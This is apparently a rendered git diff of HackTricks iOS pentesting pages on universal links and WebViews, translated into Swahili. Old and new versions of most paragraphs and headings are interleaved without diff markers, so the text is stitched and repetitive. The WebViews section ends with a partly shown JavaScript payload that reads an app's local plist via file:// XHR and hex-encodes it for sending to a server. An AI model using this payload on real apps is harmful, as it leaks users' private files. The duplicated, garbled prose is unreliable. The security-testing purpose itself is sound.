Universal links hutoa **uzoefu wa uelekezaji** usio na mshono kwa watumiaji kwa kufungua moja kwa moja maudhui katika programu, ikiepuka hitaji la uelekezaji wa Safari. Viungo hivi ni **vya kipekee** na salama, kwani haviwezi kudaiwa na programu nyingine. Hii inahakikishwa kwa kuhifadhi faili ya `apple-app-site-association` ya JSON kwenye saraka ya mzizi ya tovuti, ikianzisha kiungo kinachoweza kuthibitishwa kati ya tovuti na programu. Katika hali ambapo programu haijasanidiwa, Safari itachukua jukumu na kumwelekeza mtumiaji kwenye ukurasa wa wavuti, ikihifadhi uwepo wa programu.
Kwa watafiti wa udukuzi, faili ya `apple-app-site-association` ni ya kipekee kwani inaweza kufunua njia **nyeti**, pengine zinazohusiana na vipengele visivyotolewa bado.
Kwa wapimaji wa penetration, faili ya `apple-app-site-association` ni ya umuhimu maalum kwani inaweza kufichua **njia nyeti**, ambazo zinaweza kujumuisha zile zinazohusiana na vipengele ambavyo havijachapishwa.
### **Kuchambua Uhalali wa Domain Zilizohusishwa**
### **Kuchambua Haki za Domain Zinazohusiana**
Wabunifu huwezesha Viungo vya Kisasa kwa kusanidi **Domain Zilizohusishwa** katika kichupo cha Uwezo cha Xcode au kwa kuchunguza faili ya `.entitlements`. Kila kikoa kinaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
Wakuu wa programu wanawezesha Universal Links kwa kusanidi **Domains Zinazohusiana** katika tab ya Uwezo ya Xcode au kwa kukagua faili ya `.entitlements`. Kila domain inaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
```xml
<key>com.apple.developer.associated-domains</key>
<array>
@ -32,21 +33,21 @@ Wabunifu huwezesha Viungo vya Kisasa kwa kusanidi **Domain Zilizohusishwa** kati
<string>applinks:t.me</string>
</array>
```
Kwa ufahamu kamili zaidi, tazama [Hati za Maendeleo ya Apple zilizohifadhiwa](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Kwa maelezo zaidi ya kina, rejelea [nyaraka za Apple Developer zilizohifadhiwa](https://developer.apple.com/library/archive/documentation/General/Conceptual/AppSearch/UniversalLinks.html#//apple_ref/doc/uid/TP40016308-CH12-SW2).
Ikiwa unafanya kazi na programu iliyoundwa, ruhusu zinaweza kuchimbuliwa kama ilivyoelezwa katika [mwongozo huu](extracting-entitlements-from-compiled-application.md).
Ikiwa unafanya kazi na programu iliyokusanywa, haki zinaweza kutolewa kama ilivyoelezwa katika [hiki kiongozi](extracting-entitlements-from-compiled-application.md).
### **Kupata Faili ya Umoja wa Programu ya Apple**
### **Kurejesha Faili ya Muungano wa Tovuti ya Programu ya Apple**
Faili ya `apple-app-site-association` inapaswa kupatikana kutoka kwenye seva kwa kutumia uwanja ulioelezwa katika ruhusa. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwa `https://<uwanja>/apple-app-site-association`. Zana kama [Mthibitishaji wa Umoja wa Programu ya Apple (AASA)](https://branch.io/resources/aasa-validator/) inaweza kusaidia katika mchakato huu.
Faili ya `apple-app-site-association` inapaswa kurejeshwa kutoka kwa seva kwa kutumia maeneo yaliyoainishwa katika haki. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwenye `https://<domain>/apple-app-site-association`. Zana kama [Mthibitishaji wa Muungano wa Tovuti ya Programu ya Apple (AASA)](https://branch.io/resources/aasa-validator/) zinaweza kusaidia katika mchakato huu.
### **Kushughulikia Viungo vya Umoja katika Programu**
### **Kushughulikia Viungo vya Ulimwengu katika Programu**
Programu lazima iwekeze njia maalum za kushughulikia viungo vya umoja kwa usahihi. Njia kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URL ulioshughulikiwa ni HTTP au HTTPS, kwani vinginevyo hautasaidiwa.
Programu lazima itekeleze mbinu maalum ili kushughulikia viungo vya ulimwengu kwa usahihi. Mbinu kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URL zinazoshughulikiwa ni HTTP au HTTPS, kwani zingine hazitasaidiwa.
#### **Kuthibitisha Njia ya Kukabiliana na Data**
#### **Kuthibitisha Mbinu ya Kushughulikia Data**
Wakati kiungo cha umoja kinapofungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu pamoja na URL. Kabla ya kusindika URL hii, ni muhimu kuthibitisha na kuisafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaodhihirisha mchakato huo:
Wakati kiungo cha ulimwengu kinapofungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu na URL. Kabla ya kushughulikia URL hii, ni muhimu kuthibitisha na kusafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaoonyesha mchakato:
```swift
func application(_ application: UIApplication, continue userActivity: NSUserActivity,
restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {
@ -58,7 +59,7 @@ application.open(url, options: [:], completionHandler: nil)
return true
}
```
URLs inapaswa kuchambuliwa na kuthibitishwa kwa uangalifu, hasa ikiwa zina vigezo, ili kujilinda dhidi ya uwezekano wa kughushi au data iliyo na hitilafu. API ya `NSURLComponents` ni muhimu kwa kusudi hili, kama ilivyodhihirishwa hapa chini:
URLs zinapaswa kuchambuliwa na kuthibitishwa kwa makini, hasa ikiwa zinajumuisha vigezo, ili kujilinda dhidi ya udanganyifu au data isiyo sahihi. API ya `NSURLComponents` ni muhimu kwa ajili hii, kama inavyoonyeshwa hapa chini:
```swift
func application(_ application: UIApplication,
continue userActivity: NSUserActivity,
@ -84,28 +85,26 @@ return false
}
}
```
Kupitia **mipangilio na uthibitisho makini**, wabunifu wanaweza kuhakikisha kuwa viungo vya kipekee vinaboresha uzoefu wa mtumiaji wakati bado wanazingatia viwango vya usalama na faragha.
Kupitia **mipangilio na uthibitisho wa makini**, waendelezaji wanaweza kuhakikisha kwamba viungo vya ulimwengu vinaboresha uzoefu wa mtumiaji huku wakihifadhi viwango vya usalama na faragha.
## Tools
* [GetUniversal.link](https://getuniversal.link/): Inasaidia kurahisisha upimaji na usimamizi wa Viungo vya Ulimwengu vya programu yako na faili ya AASA. Ingiza tu kikoa chako ili kuthibitisha uhalali wa faili ya AASA au tumia dashibodi maalum ili kupima tabia ya kiungo kwa urahisi. Chombo hiki pia kinakusaidia kubaini wakati Apple itakapofanya utafutaji wa faili yako ya AASA.
## Vifaa
* [GetUniversal.link](https://getuniversal.link/): Inasaidia kusahihisha upimaji na usimamizi wa Viungo vya Kipekee vya programu yako na faili ya AASA. Ingiza tu kikoa chako ili kuthibitisha uadilifu wa faili ya AASA au tumia dashibodi ya desturi kwa urahisi kujaribu tabia ya kiungo. Kifaa hiki pia husaidia kujua lini Apple itaorodhesha faili yako ya AASA ijayo.
## Marejeo
## References
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis)
* [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

142
mobile-pentesting/ios-pentesting/ios-webviews.md
View file

@ -1,31 +1,32 @@
# iOS WebViews
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Nambari ya ukurasa huu ilichukuliwa kutoka [hapa](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Angalia ukurasa kwa maelezo zaidi.
The code of this page was extracted from [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Check the page for further details.
## Aina za WebViews
## WebViews types
WebViews hutumiwa ndani ya programu kuonyesha maudhui ya wavuti kwa njia ya kuingiliana. Aina mbalimbali za WebViews hutoa utendaji na huduma za usalama tofauti kwa programu za iOS. Hapa kuna muhtasari mfupi:
WebViews zinatumika ndani ya programu kuonyesha maudhui ya wavuti kwa njia ya mwingiliano. Aina mbalimbali za WebViews hutoa kazi tofauti na vipengele vya usalama kwa programu za iOS. Hapa kuna muhtasari mfupi:
- **UIWebView**, ambayo haipendekezwi tena kutoka iOS 12 kwenda mbele kutokana na ukosefu wake wa msaada wa kuzima **JavaScript**, hivyo kuifanya kuwa rahisi kwa mashambulizi ya kuingiza script na **Cross-Site Scripting (XSS)**.
- **UIWebView**, ambayo haitashauriwa tena kuanzia iOS 12 kwa sababu ya ukosefu wa msaada wa kuzima **JavaScript**, na kuifanya iwe hatarini kwa kuingizwa kwa script na mashambulizi ya **Cross-Site Scripting (XSS)**.
- **WKWebView** ni chaguo bora kwa kuunganisha maudhui ya wavuti kwenye programu, ikitoa udhibiti ulioboreshwa juu ya maudhui na huduma za usalama. **JavaScript** imeamilishwa kwa chaguo-msingi, lakini inaweza kuzimwa ikihitajika. Pia inasaidia huduma za kuzuia JavaScript kutoka kufungua madirisha kiotomatiki na kuhakikisha kuwa maudhui yote yanapakia kwa usalama. Kwa kuongezea, muundo wa **WKWebView** unapunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
- **WKWebView** ni chaguo linalopendekezwa kwa kuingiza maudhui ya wavuti katika programu, ikitoa udhibiti ulioimarishwa juu ya maudhui na vipengele vya usalama. **JavaScript** imewezeshwa kwa default, lakini inaweza kuzimwa ikiwa inahitajika. Pia inasaidia vipengele vya kuzuia **JavaScript** kufungua madirisha kiotomatiki na kuhakikisha kuwa maudhui yote yanapakiwa kwa usalama. Zaidi ya hayo, usanifu wa **WKWebView** hupunguza hatari ya uharibifu wa kumbukumbu kuathiri mchakato mkuu wa programu.
- **SFSafariViewController** inatoa uzoefu wa kawaida wa kuvinjari wavuti ndani ya programu, inayotambulika kwa muundo wake maalum ikiwa ni pamoja na uga wa anwani usio na uwezo wa kuandika, vifungo vya kushiriki na urambazaji, na kiunga moja kwa moja cha kufungua maudhui kwenye Safari. Tofauti na **WKWebView**, **JavaScript** haiwezi kuzimwa katika **SFSafariViewController**, ambayo pia inashiriki vidakuzi na data na Safari, ikilinda faragha ya mtumiaji kutoka kwenye programu. Lazima ionyeshwe kwa njia inayojulikana kulingana na mwongozo wa Duka la App.
- **SFSafariViewController** inatoa uzoefu wa kawaida wa kuvinjari wavuti ndani ya programu, inayotambulika kwa mpangilio wake maalum ikiwa ni pamoja na uwanja wa anwani wa kusoma tu, vitufe vya kushiriki na urambazaji, na kiungo cha moja kwa moja kufungua maudhui katika Safari. Tofauti na **WKWebView**, **JavaScript** haiwezi kuzimwa katika **SFSafariViewController**, ambayo pia inashiriki vidakuzi na data na Safari, ikihifadhi faragha ya mtumiaji kutoka kwa programu. Inapaswa kuonyeshwa kwa wazi kulingana na miongozo ya Duka la Programu.
```javascript
// Example of disabling JavaScript in WKWebView:
WKPreferences *preferences = [[WKPreferences alloc] init];
@ -34,45 +35,45 @@ WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
config.preferences = preferences;
WKWebView *webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config];
```
## Muhtasari wa Uchunguzi wa Usanidi wa WebViews
## WebViews Configuration Exploration Summary
### **Maelezo ya Uchambuzi Statiki**
### **Static Analysis Overview**
Katika mchakato wa kuchunguza usanidi wa **WebViews**, kuna aina mbili kuu zinazozingatiwa: **UIWebView** na **WKWebView**. Kwa kubainisha WebViews hizi ndani ya faili ya binary, amri hutumiwa kutafuta marejeleo ya darasa maalum na njia za kuanzisha.
Katika mchakato wa kuchunguza mipangilio ya **WebViews**, aina mbili kuu zinazingatiwa: **UIWebView** na **WKWebView**. Ili kubaini WebViews hizi ndani ya binary, amri zinatumika, zikitafuta marejeleo maalum ya darasa na mbinu za kuanzisha.
- **Uthibitisho wa UIWebView**
- **UIWebView Identification**
```bash
$ rabin2 -zz ./WheresMyBrowser | egrep "UIWebView$"
```
Amri hii inasaidia kupata sehemu za **UIWebView** kwa kutafuta herufi zinazohusiana nayo katika faili ya binary.
Hii amri inasaidia katika kutafuta matukio ya **UIWebView** kwa kutafuta nyuzi za maandiko zinazohusiana nayo katika binary.
- **Uthibitisho wa WKWebView**
- **Utambuzi wa WKWebView**
```bash
$ rabin2 -zz ./WheresMyBrowser | egrep "WKWebView$"
```
Vivyo hivyo, kwa **WKWebView**, amri hii inatafuta faili ya binary kwa maneno yanayodhihirisha matumizi yake.
Vivyo hivyo, kwa **WKWebView**, amri hii inatafuta kwenye binary kwa maandiko yanayoashiria matumizi yake.
Zaidi ya hayo, ili kupata jinsi **WKWebView** inavyoanzishwa, amri ifuatayo inatekelezwa, ikilenga saini ya njia inayohusiana na uanzishaji wake:
```bash
$ rabin2 -zzq ./WheresMyBrowser | egrep "WKWebView.*frame"
```
#### **Uhakiki wa Usanidi wa JavaScript**
#### **JavaScript Configuration Verification**
Kwa **WKWebView**, inasisitizwa kuwa kuzima JavaScript ni njia bora isipokuwa ikihitajika. Faili iliyoundwa inatafutwa ili kuhakikisha kuwa mali ya `javaScriptEnabled` imewekwa kama `false`, ikidhibitisha kuwa JavaScript imezimwa:
Kwa **WKWebView**, inasisitizwa kwamba kuzima JavaScript ni njia bora isipokuwa inahitajika. Binafsi iliyokusanywa inatafutwa ili kuthibitisha kwamba mali ya `javaScriptEnabled` imewekwa kuwa `false`, kuhakikisha kwamba JavaScript imezimwa:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "javascriptenabled"
```
#### **Uthibitisho wa Yaliyomo Salama Pekee**
#### **Tu Thibitisho la Maudhui Salama Pekee**
**WKWebView** inatoa uwezo wa kutambua matatizo ya yaliyomo mchanganyiko, tofauti na **UIWebView**. Hii inathibitishwa kwa kutumia mali ya `hasOnlySecureContent` ili kuhakikisha kuwa rasilimali zote za ukurasa zimepakiwa kupitia uhusiano salama. Utafutaji katika faili iliyohaririwa hufanyika kama ifuatavyo:
**WKWebView** inatoa uwezo wa kubaini masuala ya maudhui mchanganyiko, tofauti na **UIWebView**. Hii inakaguliwa kwa kutumia mali ya `hasOnlySecureContent` ili kuhakikisha rasilimali zote za ukurasa zinapakiwa kupitia muunganisho salama. Utafutaji katika binary iliyokusanywa unafanywa kama ifuatavyo:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "hasonlysecurecontent"
```
### **Machapisho ya Uchambuzi wa Kudumu**
### **Uchambuzi wa Kineti**
Uchambuzi wa kudumu unahusisha ukaguzi wa kundi la kumbukumbu ya WebView na mali zake. Skripti iliyoitwa `webviews_inspector.js` hutumiwa kwa kusudi hili, ikilenga kundi la kumbukumbu za `UIWebView`, `WKWebView`, na `SFSafariViewController`. Inaandika habari kuhusu kundi la kumbukumbu zilizopatikana, ikiwa ni pamoja na URL na mipangilio inayohusiana na JavaScript na maudhui salama.
Uchambuzi wa kineti unahusisha kukagua heap kwa ajili ya mifano ya WebView na mali zao. Skripti inayoitwa `webviews_inspector.js` inatumika kwa kusudi hili, ikilenga mifano ya `UIWebView`, `WKWebView`, na `SFSafariViewController`. Inarekodi taarifa kuhusu mifano iliyopatikana, ikiwa ni pamoja na URLs na mipangilio inayohusiana na JavaScript na maudhui salama.
Ukaguzi wa kundi la kumbukumbu unaweza kufanywa kwa kutumia `ObjC.choose()` ili kutambua kundi la kumbukumbu za WebView na kuangalia mali za `javaScriptEnabled` na `hasonlysecurecontent`.
Ukaguzi wa heap unaweza kufanywa kwa kutumia `ObjC.choose()` ili kubaini mifano ya WebView na kuangalia mali za `javaScriptEnabled` na `hasonlysecurecontent`.
{% code title="webviews_inspector.js" %}
```javascript
@ -121,30 +122,30 @@ console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());
```
{% endcode %}
Script inatekelezwa kwa kutumia:
Script inatekelezwa na:
```bash
frida -U com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js
```
**Matokeo Muhimu**:
- Sehemu za WebViews zinapatikana na kuchunguzwa kwa mafanikio.
- Uwezeshaji wa JavaScript na mipangilio salama ya maudhui inathibitishwa.
- Mifano ya WebViews imefanikiwa kupatikana na kukaguliwa.
- Uthibitishaji wa kuwezesha JavaScript na mipangilio ya maudhui salama umefanywa.
Muhtasari huu unawakilisha hatua muhimu na amri zinazohusika katika uchambuzi wa mipangilio ya WebView kupitia njia za tuli na za kudumu, kuzingatia vipengele vya usalama kama uwezeshaji wa JavaScript na ugunduzi wa maudhui yaliyochanganyika.
Muhtasari huu unajumuisha hatua muhimu na amri zinazohusika katika kuchambua usanidi wa WebView kupitia mbinu za statiki na za dinamik, zikilenga kwenye vipengele vya usalama kama kuwezesha JavaScript na kugundua maudhui mchanganyiko.
## Kusindika Itifaki za WebView
## Usimamizi wa Itifaki ya WebView
Kusindika maudhui katika WebViews ni jambo muhimu, haswa linapokuja suala la itifaki mbalimbali kama vile `http(s)://`, `file://`, na `tel://`. Itifaki hizi huruhusu kupakia maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kubadilisha jina au njia ya faili na kuhariri maudhui yenyewe.
Kushughulikia maudhui katika WebViews ni kipengele muhimu, hasa linapokuja suala la itifaki mbalimbali kama `http(s)://`, `file://`, na `tel://`. Itifaki hizi zinawezesha upakiaji wa maudhui ya mbali na ya ndani ndani ya programu. Inasisitizwa kwamba wakati wa kupakia maudhui ya ndani, tahadhari lazima ichukuliwe ili kuzuia watumiaji kuathiri jina la faili au njia na kutoka kuhariri maudhui yenyewe.
**WebViews** hutoa njia tofauti za kupakia maudhui. Kwa **UIWebView**, ambayo sasa imepitwa na wakati, njia kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` hutumiwa. **WKWebView**, kwa upande mwingine, hutumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Njia kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kawaida hutumiwa kupakia faili za ndani. Njia `loadFileURL:allowingReadAccessToURL:` ni muhimu hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ikifichua data nyeti ikiwa saraka imeelekezwa.
**WebViews** hutoa mbinu tofauti za upakiaji wa maudhui. Kwa **UIWebView**, ambayo sasa imeondolewa, mbinu kama `loadHTMLString:baseURL:` na `loadData:MIMEType:textEncodingName:baseURL:` zinatumika. **WKWebView**, kwa upande mwingine, inatumia `loadHTMLString:baseURL:`, `loadData:MIMEType:textEncodingName:baseURL:`, na `loadRequest:` kwa maudhui ya wavuti. Mbinu kama `pathForResource:ofType:`, `URLForResource:withExtension:`, na `init(contentsOf:encoding:)` kwa kawaida hutumiwa kwa upakiaji wa faili za ndani. Mbinu `loadFileURL:allowingReadAccessToURL:` inajulikana hasa kwa uwezo wake wa kupakia URL au saraka maalum ndani ya WebView, ambayo inaweza kufichua data nyeti ikiwa saraka imeainishwa.
Ili kupata njia hizi katika nambari ya chanzo au faili iliyokompiliwa, amri kama zifuatazo zinaweza kutumika:
Ili kupata mbinu hizi katika msimbo wa chanzo au binary iliyokusanywa, amri kama ifuatayo zinaweza kutumika:
```bash
$ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
231 0x0002df6c 24 (4.__TEXT.__objc_methname) ascii loadHTMLString:baseURL:
```
Kuhusu **upatikanaji wa faili**, UIWebView inaruhusu kwa ujumla, wakati WKWebView inaleta mipangilio ya `allowFileAccessFromFileURLs` na `allowUniversalAccessFromFileURLs` kwa kusimamia upatikanaji kutoka kwa URL za faili, ambapo zote mbili ni za uwongo kwa chaguo-msingi.
Kuhusu **file access**, UIWebView inaruhusu kwa ujumla, wakati WKWebView inaanzisha mipangilio ya `allowFileAccessFromFileURLs` na `allowUniversalAccessFromFileURLs` kwa ajili ya kudhibiti ufikiaji kutoka kwa URL za faili, ambapo zote ni za uongo kwa chaguo-msingi.
Mfano wa skrini ya Frida umetolewa kuangalia mipangilio ya usalama ya **WKWebView**:
Mfano wa skripti ya Frida unatolewa ili kukagua mipangilio ya **WKWebView** kwa ajili ya mipangilio ya usalama:
```bash
ObjC.choose(ObjC.classes['WKWebView'], {
onMatch: function (wk) {
@ -162,7 +163,7 @@ console.log('done for WKWebView!');
}
});
```
Mwisho, mfano wa mzigo wa JavaScript unaolenga kuvuja faili za ndani unaonyesha hatari ya usalama inayohusiana na WebViews zisizowekwa vizuri. Mzigo huu unakodisha maudhui ya faili kwa muundo wa hex kabla ya kuyatuma kwa seva, ukionyesha umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
Lastly, mfano wa JavaScript payload unaolenga kuhamasisha faili za ndani unaonyesha hatari ya usalama inayoweza kutokea kutokana na WebViews zisizofanywa vizuri. Huu payload unachakata maudhui ya faili katika muundo wa hex kabla ya kuyatumia kwa seva, ukisisitiza umuhimu wa hatua kali za usalama katika utekelezaji wa WebView.
```javascript
String.prototype.hexEncode = function(){
var hex, i;
@ -185,24 +186,24 @@ xhr2.send(null);
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
xhr.send(null);
```
## Njia za Asili Zilizofunuliwa Kupitia WebViews
## Mbinu za Asili Zinazofichuliwa Kupitia WebViews
## Kuelewa Miunganisho ya Asili ya WebView katika iOS
## Kuelewa Interfaces za Asili za WebView katika iOS
Kuanzia iOS 7 na kuendelea, Apple ilitoa APIs kwa **mawasiliano kati ya JavaScript katika WebView na vitu vya asili** vya Swift au Objective-C. Ushirikiano huu unawezeshwa hasa kupitia njia mbili:
Kuanzia iOS 7 na kuendelea, Apple ilitoa APIs kwa **mawasiliano kati ya JavaScript katika WebView na asili** Swift au Objective-C vitu. Uunganisho huu unafanywa hasa kupitia mbinu mbili:
- **JSContext**: Kazi ya JavaScript inaundwa moja kwa moja wakati kipande cha Swift au Objective-C kinahusishwa na kitambulisho ndani ya `JSContext`. Hii inaruhusu ushirikiano na mawasiliano laini kati ya JavaScript na nambari ya asili.
- **Itifaki ya JSExport**: Kwa kurithi itifaki ya `JSExport`, mali za asili, njia za kesi, na njia za darasa zinaweza kufunuliwa kwa JavaScript. Hii inamaanisha mabadiliko yoyote yaliyofanywa katika mazingira ya JavaScript yanajitokeza katika mazingira ya asili, na kinyume chake. Hata hivyo, ni muhimu kuhakikisha kuwa data nyeti haifichuliwi kwa bahati mbaya kupitia njia hii.
- **JSContext**: Kazi ya JavaScript inaundwa kiotomatiki wakati block ya Swift au Objective-C inapounganishwa na kitambulisho ndani ya `JSContext`. Hii inaruhusu uunganisho na mawasiliano yasiyo na mshono kati ya JavaScript na msimbo wa asili.
- **JSExport Protocol**: Kwa kurithi protokali ya `JSExport`, mali za asili, mbinu za mfano, na mbinu za darasa zinaweza kufichuliwa kwa JavaScript. Hii inamaanisha kwamba mabadiliko yoyote yaliyofanywa katika mazingira ya JavaScript yanaakisiwa katika mazingira ya asili, na kinyume chake. Hata hivyo, ni muhimu kuhakikisha kuwa data nyeti haifichuliwi bila kukusudia kupitia mbinu hii.
### Kupata `JSContext` katika Objective-C
### Kufikia `JSContext` katika Objective-C
Katika Objective-C, `JSContext` kwa `UIWebView` inaweza kupatikana kwa kutumia msimbo ufuatao:
Katika Objective-C, `JSContext` kwa `UIWebView` inaweza kupatikana kwa mstari ufuatao wa msimbo:
```objc
[webView valueForKeyPath:@"documentView.webView.mainFrame.javaScriptContext"]
```
### Mawasiliano na `WKWebView`
### Communication with `WKWebView`
Kwa `WKWebView`, ufikiaji moja kwa moja wa `JSContext` haupo. Badala yake, ujumbe unatumwa kupitia kazi ya `postMessage`, kuruhusu mawasiliano kati ya JavaScript na programu ya asili. Wachanganuzi kwa ajili ya ujumbe huu huanzishwa kama ifuatavyo, kuruhusu JavaScript kuingiliana na programu ya asili kwa usalama:
Kwa `WKWebView`, ufikiaji wa moja kwa moja kwa `JSContext` haupatikani. Badala yake, upitishaji ujumbe unatumika kupitia kazi ya `postMessage`, ikiruhusu mawasiliano kati ya JavaScript na asili. Watoa huduma kwa ujumbe hawa wamewekwa kama ifuatavyo, ikiruhusu JavaScript kuingiliana na programu ya asili kwa usalama:
```swift
func enableJavaScriptBridge(_ enabled: Bool) {
options_dict["javaScriptBridge"]?.value = enabled
@ -215,9 +216,9 @@ userContentController.add(javaScriptBridgeMessageHandler, name: "javaScriptBridg
}
}
```
### Mwingiliano na Majaribio
### Interaction and Testing
JavaScript inaweza kuingiliana na safu ya asili kwa kufafanua kifaa cha ujumbe cha skripti. Hii inaruhusu shughuli kama kuita kazi za asili kutoka kwenye ukurasa wa wavuti:
JavaScript inaweza kuingiliana na safu asilia kwa kufafanua mpangilio wa ujumbe wa skripti. Hii inaruhusu operesheni kama vile kuita kazi za asili kutoka kwa ukurasa wa wavuti:
```javascript
function invokeNativeOperation() {
value1 = document.getElementById("value1").value
@ -228,7 +229,7 @@ window.webkit.messageHandlers.javaScriptBridge.postMessage(["multiplyNumbers", v
